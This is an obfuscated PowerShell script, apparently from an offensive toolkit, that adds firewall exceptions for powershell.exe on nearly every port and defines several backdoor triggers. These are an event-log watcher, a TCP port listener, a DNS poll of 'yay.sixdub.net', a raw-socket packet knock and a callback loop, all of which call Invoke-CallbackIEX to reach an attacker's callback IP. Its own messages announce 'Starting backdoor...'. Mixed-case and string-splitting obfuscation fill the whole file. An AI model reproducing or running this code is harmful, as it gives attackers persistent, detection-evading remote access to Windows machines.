-{ - - Param( - [Parameter(MaNDaToRY=${FA`LsE},pOsITion=1)] - [string]${ruL`en`Ame}="Windows Powershell", - [Parameter(maNDAtorY=${F`A`lSe},PoSItioN=2)] - [string]${e`xE`PATH}="C:\windows\system32\windowspowershell\v1.0\powershell.exe", - [Parameter(maNdatOry=${fAL`SE},poSitIon=3)] - [string]${P`oRtS}="1-65000" - ) - - If (-NOT ([Security.Principal.WindowsPrincipal] (GeT-vArIAblE ("zN"+"U") -ValueO )::"GEtCu`RR`eNt"())."IS`inR`OLe"([Security.Principal.WindowsBuiltInRole] "Administrator")) - { - Write-Host "This command requires Admin :(... get to work! " - Return - } - - - ${fw} = New-Object -ComObject ("{2}{1}{3}{0}"-f'2','cfg.fwp','hnet','olicy') - ${R`ULE} = New-Object -ComObject ("{2}{1}{3}{0}" -f 'e','NetCf','H','g.FWRul') - ${R`ulE}."n`AME" = ${Rul`E`Na`ME} - ${R`ULE}."apP`LICAt`I`Onna`Me"=${e`XEPA`TH} - ${RU`Le}."p`RO`TOcOL" = 6 - ${rU`LE}."loC`A`LPOrTS" = ${p`oRtS} - ${ru`LE}."dI`ReCTIOn" = 2 - ${Ru`Le}."E`NA`BlED"=${t`RuE} - ${R`Ule}."g`Ro`upinG"="@firewallapi.dll,-23255" - ${ru`LE}."pro`FiL`ES" = 7 - ${R`uLe}."A`cTiON"=1 - ${r`uLe}."EDGetRA`V`E`RSAl"=${f`AlSE} - ${fw}."r`ulES"."a`Dd"(${ru`lE}) - - - ${r`ULe} = New-Object -ComObject ("{3}{0}{2}{1}"-f '.FWR','le','u','HNetCfg') - ${rU`Le}."Na`Me" = ${RulE`NAME} - ${Ru`Le}."APPLICa`Tio`NN`A`me"=${E`x`EpAth} - ${rU`LE}."p`RoTOcoL" = 17 - ${r`ule}."LoCAL`po`RTS" = ${P`orTs} - ${rU`le}."DiRe`cTI`ON" = 2 - ${RU`le}."en`AblEd"=${tR`uE} - ${R`uLE}."GroupI`Ng"="@firewallapi.dll,-23255" - ${R`uLe}."p`ROfi`LEs" = 7 - ${R`ULe}."aCt`i`oN"=1 - ${Ru`Le}."EDgeTrAVE`R`saL"=${f`A`lse} - ${Fw}."Rul`es"."a`dd"(${r`uLE}) - - - ${ru`LE} = New-Object -ComObject ("{1}{0}{2}{3}"-f'fg.F','HNetC','WRu','le') - ${rU`Le}."NA`mE" = ${Ru`le`NAme} - ${R`ULe}."a`ppLICationNa`ME"=${E`XepAth} - ${Ru`LE}."P`R`otOcOl" = 6 - ${R`UlE}."L`O`caLporTS" = ${Por`Ts} - ${R`ulE}."d`I`REcTiOn" = 1 - ${ru`lE}."ENA`BL`ED"=${tr`UE} - ${r`UlE}."gro`uPI`Ng"="@firewallapi.dll,-23255" - ${r`uLE}."Pr`O`FILEs" = 7 - ${r`Ule}."A`C`TiON"=1 - ${ru`lE}."EDgE`TRAV`ERSaL"=${fA`lsE} - ${F`w}."RU`les"."A`dd"(${RU`lE}) - - - ${r`UlE} = New-Object -ComObject ("{0}{1}{2}{3}" -f 'H','NetCfg','.FW','Rule') - ${r`uLE}."n`AMe" = ${ruleNa`me} - ${Ru`le}."APp`LicaT`I`oN`NamE"=${ExePa`TH} - ${rU`Le}."P`Rot`OCol" = 17 - ${RU`Le}."Loc`Alp`ORTs" = ${poR`Ts} - ${r`ulE}."DIRectI`on" = 1 - ${r`ulE}."en`A`BLeD"=${t`Rue} - ${RU`Le}."Gr`oUP`iNG"="@firewallapi.dll,-23255" - ${r`UlE}."PrO`F`ileS" = 7 - ${r`uLE}."A`CTI`ON"=1 - ${R`ule}."Ed`gET`RaV`eRsaL"=${F`ALSe} - ${F`W}."r`uLEs"."A`Dd"(${R`ule}) - -} - -function InVOk`e`-EVeNTLoop -{ - - Param( - [Parameter(mANdAtOry=${T`RUE},POsiTion=1)] - [string]${cAlLBa`Ck`Ip}, - [Parameter(MaNdAtoRY=${fA`lSE},PosITion=2)] - [string]${tRI`GG`ER}="SIXDUB", - [Parameter(MAnDaTORy=${F`AL`SE},PoSITIOn=3)] - [int]${tiM`EoUt}=0, - [Parameter(maNDatOry=${fA`LSE},PosiTiON=4)] - [int] ${s`lEEP}=1 - ) - - If (-NOT ([Security.Principal.WindowsPrincipal] ( vARIABLe ('z'+'NU') -vALUEONl)::"gEtc`ur`ReNT"())."IsiN`RoLE"([Security.Principal.WindowsBuiltInRole] "Administrator")) - { - Write-Host "This backdoor requires Admin :(... get to work! " - Return - } - - write-host "Timeout: $Timeout" - write-host "Trigger: $Trigger" - write-host "CallbackIP: $CallbackIP" - write-host - write-host "Starting backdoor..." - - - ${rUN`Ni`NG}=${t`RUE} - ${mAT`ch} ="" - ${s`TArt`TImE} = get-date - while(${runn`i`Ng}) - { - - if (${timE`ouT} -ne 0 -and ($( ( vaRIAble ('I6S5n'+'r') ).VALuE::"N`OW") -gt ${st`A`RTtI`mE}."aDDs`ECO`NDs"(${ti`MEO`ut}))) - { - ${rUn`N`inG}=${FA`lSE} - } - - ${D} = Get-Date - ${n`eW`EVEnTs} = Get-WinEvent -FilterHashtable @{"l`og`NAMe"='Security'; "ST`ArTT`IME"=${D}."aDDSecO`N`DS"(-${Sl`eEp})} -ErrorAction ("{2}{1}{0}"-f'ntinue','Co','Silently') | fl ("{1}{2}{0}" -f'e','M','essag') | Out-String - - - if (${nEw`even`TS} -match ${Tri`Gg`eR}) - { - ${runN`i`NG}=${FA`lSE} - ${MAt`Ch} = ${C`Al`lbA`ckIP} - write-host "Match: $match" - } - sleep -s ${Sl`E`EP} - } - if(${m`Atch}) - { - ${suc`c`ESS} = Invoke-CallbackIEX ${MA`T`Ch} - } -} - -function iNvo`KE`-pORTB`i`ND -{ - - Param( - [Parameter(MANdatory=${f`AlsE},PoSiTion=1)] - [string]${Cal`L`BAckiP}, - [Parameter(maNDaTOrY=${fA`lse},pOSItIon=2)] - [string]${L`ocalIP}, - [Parameter(mANDatorY=${f`ALSe},POsitION=3)] - [int]${P`OrT}=4444, - [Parameter(maNdAToRy=${F`AlsE},pOSiTIoN=4)] - [string]${t`R`iGgEr}="QAZWSX123", - [Parameter(MAnDAtoRY=${FA`LSE},POSiTion=5)] - [int]${TIM`E`ouT}=0 - ) - - - if (-not ${LOc`A`lIP}) - { - route ("{1}{0}"-f'int','pr') ('0*') | % { - if (${_} -match "\s{2,}0\.0\.0\.0") { - ${N`ulL},${NU`ll},${N`ulL},${L`oCALIP},${n`uLl} = (VARiABle ('Q8w'+'Gpc') -VaLUeoNL )::"REp`LA`cE"(${_}."trI`MSTa`RT"(" "),"\s{2,}",",")."sPl`it"(",") - } - } - } - - - write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!" - write-host "Timeout: $Timeout" - write-host "Port: $Port" - write-host "Trigger: $Trigger" - write-host "Using IPv4 Address: $LocalIP" - write-host "CallbackIP: $CallbackIP" - write-host - write-host "Starting backdoor..." - try{ - - - ${iPeNd`POi`Nt} = new-object ("{2}{1}{0}{5}{4}{3}" -f't.ip','m.ne','syste','t','in','endpo')([net.ipaddress]"$localIP",${P`Ort}) - ${li`sTE`NEr} = new-object ("{0}{2}{7}{4}{6}{8}{1}{5}{3}" -f 'Sys','n','tem.','r','ock','e','ets.TcpLi','Net.S','ste') ${i`p`En`DPoinT} - ${L`Isten`er}."St`Art"() - - - ${RU`N`NinG}=${tr`Ue} - ${M`AtCH} ="" - ${sta`R`TTi`ME} = get-date - while(${RU`Nn`inG}) - { - - if (${T`IMEO`ut} -ne 0 -and ($( ( Gi ("{2}{0}{3}{1}"-f 'RiaBlE','5NR','VA',':I6S') ).VALue::"N`ow") -gt ${St`AR`TTIME}."Ad`d`sECoNds"(${Ti`M`eOuT}))) - { - ${Ru`NN`inG}=${Fa`L`se} - } - - - if(${l`ISTE`NER}."Pe`Nd`Ing"()) - { - - ${cL`I`EnT} = ${liSt`EN`Er}."accE`PTtcp`cl`IE`Nt"() - write-host "Client Connected!" - ${S`TR`eam} = ${cl`IENT}."Ge`Tst`REAm"() - ${REAd`ER} = new-object ("{3}{0}{4}{2}{1}" -f 'IO.','eader','reamR','System.','St') ${st`REAm} - - - ${Li`NE} = ${RE`AD`Er}."reA`D`Line"() - - - if (${LI`Ne} -eq ${tRIG`G`Er}) - { - ${ru`Nni`Ng}=${FA`lSE} - ${M`AT`CH} = ([system.net.ipendpoint] ${C`LI`enT}."cL`ieNt"."rEmotE`enDP`O`i`Nt")."aDD`R`ESS"."tOsTr`ING"() - write-host "MATCH: $match" - } - - - ${reaD`eR}."dI`SpoSe"() - ${ST`R`eAM}."dISPO`SE"() - ${cli`E`NT}."c`LosE"() - write-host "Client Disconnected" - } - } - - - write-host "Stopping Socket" - ${l`ISTenEr}."s`TOp"() - if(${mA`TCh}) - { - if(${CA`lLb`A`Ckip}) - { - ${Suc`CesS} = Invoke-CallbackIEX ${c`AlLbA`cKIp} - } - else - { - ${SuC`cE`Ss} = Invoke-CallbackIEX ${MAt`Ch} - } - } - } - catch [System.Net.Sockets.SocketException] { - write-host "Error: Socket Error" -fore ("{0}{1}"-f're','d') - } -} - -function InVo`kE`-`DNsL`OOp -{ - - param( - [Parameter(mAndATOry=${FA`lse},pOsiTIOn=1)] - [string]${C`AllBack`IP}, - [Parameter(MandATOrY=${fa`l`se},POsitioN=2)] - [string]${HO`S`TnaMe}="yay.sixdub.net", - [Parameter(MaNDaTOry=${fA`lSe},POsitiOn=3)] - [string]${TrIg`G`ER}="127.0.0.1", - [Parameter(MaNDaToRY=${F`Al`se},PoSItIOn=4)] - [int] ${TIme`O`Ut}=0, - [Parameter(mAnDAtory=${Fa`l`SE},PoSItioN=5)] - [int] ${sLe`Ep}=1 - ) - - - write-host "Timeout: $Timeout" - write-host "Sleep Time: $Sleep" - write-host "Trigger: $Trigger" - write-host "Using Hostname: $Hostname" - write-host "CallbackIP: $CallbackIP" - write-host - write-host "Starting backdoor..." - - - ${r`UN`NinG}=${tr`ue} - ${mat`cH} ="" - ${Sta`RTt`ime} = get-date - while(${RUn`NIng}) - { - - if (${Tim`EouT} -ne 0 -and ($( ( gET-vARIAble ("I6s5"+"Nr") ).value::"N`Ow") -gt ${Sta`R`TtiME}."aDDSec`O`Nds"(${TIM`eO`Ut}))) - { - ${R`uN`NInG}=${Fa`L`sE} - } - - try { - - ${I`pS} = ( Get-VArIABle ("{1}{0}"-f 'RIxE','t') -vA)::"gEtH`OsTaD`DrEsS`Es"(${HO`stN`A`ME}) - foreach (${ad`Dr} in ${I`Ps}) - { - - - ${r`Es`OL`Ved}=${a`DDR}."IpADdrESsT`Os`T`RING" - if(${reS`OL`VEd} -ne ${tR`I`Gger}) - { - ${RuN`NIng}=${F`AL`Se} - ${mA`TcH}=${re`SOLv`Ed} - write-host "Match: $match" - } - - } - } - catch [System.Net.Sockets.SocketException]{ - - } - - sleep -s ${s`L`eEp} - } - write-host "Shutting down DNS Check..." - if(${ma`Tch}) - { - if(${CAlLbAc`K`IP}) - { - ${su`cce`ss} = Invoke-CallbackIEX ${cA`lLBack`ip} - } - else - { - ${su`ccE`sS} = Invoke-CallbackIEX ${m`ATch} - } - } -} - -function inVok`e-P`ACKe`TkNOcK -{ - - param( - [Parameter(MANdaTorY=${faL`sE},pOsitIoN=1)] - [string]${CaLL`B`Ack`iP}, - [Parameter(MANdatoRy=${f`Alse},POSiTion=2)] - [string]${lo`cAL`iP}, - [Parameter(maNdatOrY=${f`AlSE},PoSiTIOn=3)] - [string]${tRIgG`eR}="QAZWSX123", - [Parameter(mAndaTORY=${fal`SE},pOsITIon=4)] - [int]${tI`Me`OUt}=0 - ) - If (-NOT ([Security.Principal.WindowsPrincipal] ( get-VARIABle ("Zn"+"u") -vaLueONLy)::"GE`TCuRr`e`NT"())."i`sIn`RoLe"([Security.Principal.WindowsBuiltInRole] "Administrator")) - { - Write-Host "This backdoor requires Admin :(... get to work! " - Return - } - - if (-not ${lo`caLIP}) - { - route ("{1}{0}" -f'int','pr') ('0*') | % { - if (${_} -match "\s{2,}0\.0\.0\.0") { - ${nU`lL},${n`ULL},${nu`Ll},${L`oC`AliP},${n`ull} = ( lS ("vaRIaBlE"+":Q8WgP"+"C") ).vALue::"re`P`lACE"(${_}."T`Ri`mStArT"(" "),"\s{2,}",",")."SP`lIt"(",") - } - } - } - - - write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!" - write-host "Timeout: $Timeout" - write-host "Trigger: $Trigger" - write-host "Using IPv4 Address: $LocalIP" - write-host "CallbackIP: $CallbackIP" - write-host - write-host "Starting backdoor..." - - - ${BY`TE`IN} = new-object ("{1}{0}" -f 'te[]','by') 4 - ${BY`TE`oUT} = new-object ("{2}{0}{1}" -f't','e[]','by') 4 - ${by`T`edata} = new-object ("{0}{1}" -f 'byte[',']') 4096 - - ${BYTE`iN}[0] = 1 - ${b`YT`EIn}[1-3] = 0 - ${byT`eOut}[0-3] = 0 - - - ${s`OCket} = new-object ("{5}{3}{2}{6}{4}{0}{1}" -f 'kets','.socket','n','stem.','soc','sy','et.')( (DIR ("{2}{0}{3}{1}{4}"-f'lE:','fI','vaRIAb','L8','uY')).value::"iNte`R`Ne`TwoRk", (GCi ("{1}{0}{2}{3}"-f'aRIABLe:2','v','64p','VJ') ).ValUE::"r`AW", $EaCs::"Ip") - ${s`ocK`Et}."sEtSOc`ketopti`On"("IP","HeaderIncluded",${t`RUe}) - ${So`CK`eT}."re`ceIve`BufFEr`sIzE" = 819200 - - - ${i`pE`N`dpoint} = new-object ("{6}{2}{0}{5}{4}{1}{3}"-f'em.n','i','t','nt','ipendpo','et.','sys')([net.ipaddress]"$localIP",0) - ${S`OCkEt}."b`inD"(${i`pendP`oI`NT}) - - - [void]${s`Oc`kEt}."IocoNtr`ol"( $jmhB::"r`EceIV`eA`ll",${bYT`eiN},${B`yT`eoUt}) - - - ${s`T`AR`TTiME} = get-date - ${rUN`NiNG} = ${Tr`Ue} - ${MAt`cH} = "" - ${p`Ack`Ets} = @() - while (${r`UN`NiNg}) - { - - if (${T`I`MeOut} -ne 0 -and ($( (GET-chIldiTEM ("{3}{0}{4}{2}{1}"-f'arIABLe:','s5NR','6','V','i') ).vaLUe::"N`OW") -gt ${St`A`R`TtimE}."a`d`dsecONDS"(${tI`MeoUT}))) - { - ${RU`Nn`INg}=${f`ALSe} - } - - if (-not ${S`oCkeT}."aV`AIlA`BLe") - { - start-sleep -milliseconds 500 - continue - } - - - ${R`cV} = ${s`Ock`ET}."rE`Ce`IVe"(${Byt`E`DATA},0,${BYTe`d`A`Ta}."lEN`GtH", $y4HBR::"NO`NE") - - - ${meMOr`YS`Tr`eAm} = new-object ("{5}{6}{3}{1}{2}{0}{4}" -f 'mo','.M','e','O','ryStream','Syste','m.I')(${B`Y`TedatA},0,${r`cv}) - ${B`InArYRE`A`Der} = new-object ("{0}{4}{1}{3}{2}"-f 'Syst','.Bi','der','naryRea','em.IO')(${mEm`o`RYstREAM}) - - - ${T`RaSH} = ${B`iN`A`RYrea`DER}."rE`A`DbytEs"(12) - - - ${SO`Ur`Ceip`A`dDRess} = ${BInA`RYREa`DEr}."reA`DUin`T32"() - ${sOU`Rc`Eip`AddrEsS} = [System.Net.IPAddress]${SO`U`RceiP`ADD`REss} - ${Des`TinAtiOnIP`A`DD`RESs} = ${B`InaRYr`e`ADeR}."reAd`u`INt32"() - ${d`ESt`i`NA`TioNIPAd`Dre`SS} = [System.Net.IPAddress]${de`s`T`INAtIONIpaddR`E`ss} - ${REmai`NDerb`Y`Tes} = ${bIn`ArY`R`EAder}."R`EA`DbYTeS"(${me`M`OrysT`Re`AM}."l`En`gTH") - - - ${ASciie`N`CODIng} = new-object ("{3}{1}{4}{2}{0}" -f 'iiencoding','stem','xt.asc','sy','.te') - ${reMaINd`E`ROfPAcK`et} = ${asc`Iienc`oDing}."g`ETS`TRINg"(${remai`Nder`B`Y`Tes}) - - - ${b`InarY`R`EaDEr}."c`loSe"() - ${m`eM`OryStR`E`AM}."Cl`Ose"() - - - if (${R`EmA`IndER`OFPA`C`KEt} -match ${T`RiG`ger}) - { - write-host "Match: " ${SourCE`iPa`D`d`ReSS} - ${r`uNNi`Ng}=${FAl`SE} - ${MAt`ch} = ${S`ourCEIpaD`d`Re`sS} - } - } - - if(${MA`T`CH}) - { - if(${cAL`lB`AcK`ip}) - { - ${S`uCC`EsS} = Invoke-CallbackIEX ${C`A`llbaCKIp} - } - else - { - ${sU`Cce`ss} = Invoke-CallbackIEX ${Ma`Tch} - } - } - -} - -function i`N`Vok`E-CalLb`AC`KLOop -{ - - Param( - [Parameter(MaNdATorY=${tR`uE},PoSitIoN=1)] - [string]${c`All`Ba`ckIP}, - [Parameter(maNDatoRY=${f`AL`se},poSItION=2)] - [int]${tiME`O`ut}=0, - [Parameter(ManDATORy=${Fa`LSE},poSiTion=3)] - [int] ${Sle`Ep}=1 - ) - - - write-host "Timeout: $Timeout" - write-host "Sleep: $Sleep" - write-host "CallbackIP: $CallbackIP" - write-host - write-host "Starting backdoor..." - - - ${Runn`I`NG}=${t`RuE} - ${ma`T`ch} ="" - ${s`TART`TiMe} = get-date - while(${r`u`NNing}) - { - - if (${Ti`MeOuT} -ne 0 -and ($( ( gET-VARIAblE ("i6S"+"5nR") -vAlue)::"n`ow") -gt ${St`ArTTi`mE}."addS`e`conds"(${TI`mE`ouT}))) - { - ${Ru`N`NiNg}=${F`Al`sE} - } - - ${Ch`E`cksucce`ss} = Invoke-CallbackIEX ${C`ALLB`AcKiP} -Silent ${Tr`uE} - - if(${ch`e`ckS`UCc`ESs} -eq 1) - { - ${R`unn`inG}=${fal`Se} - } - - sleep -s ${s`l`EeP} - } - - write-host "Shutting down backdoor..." -} \ No newline at end of file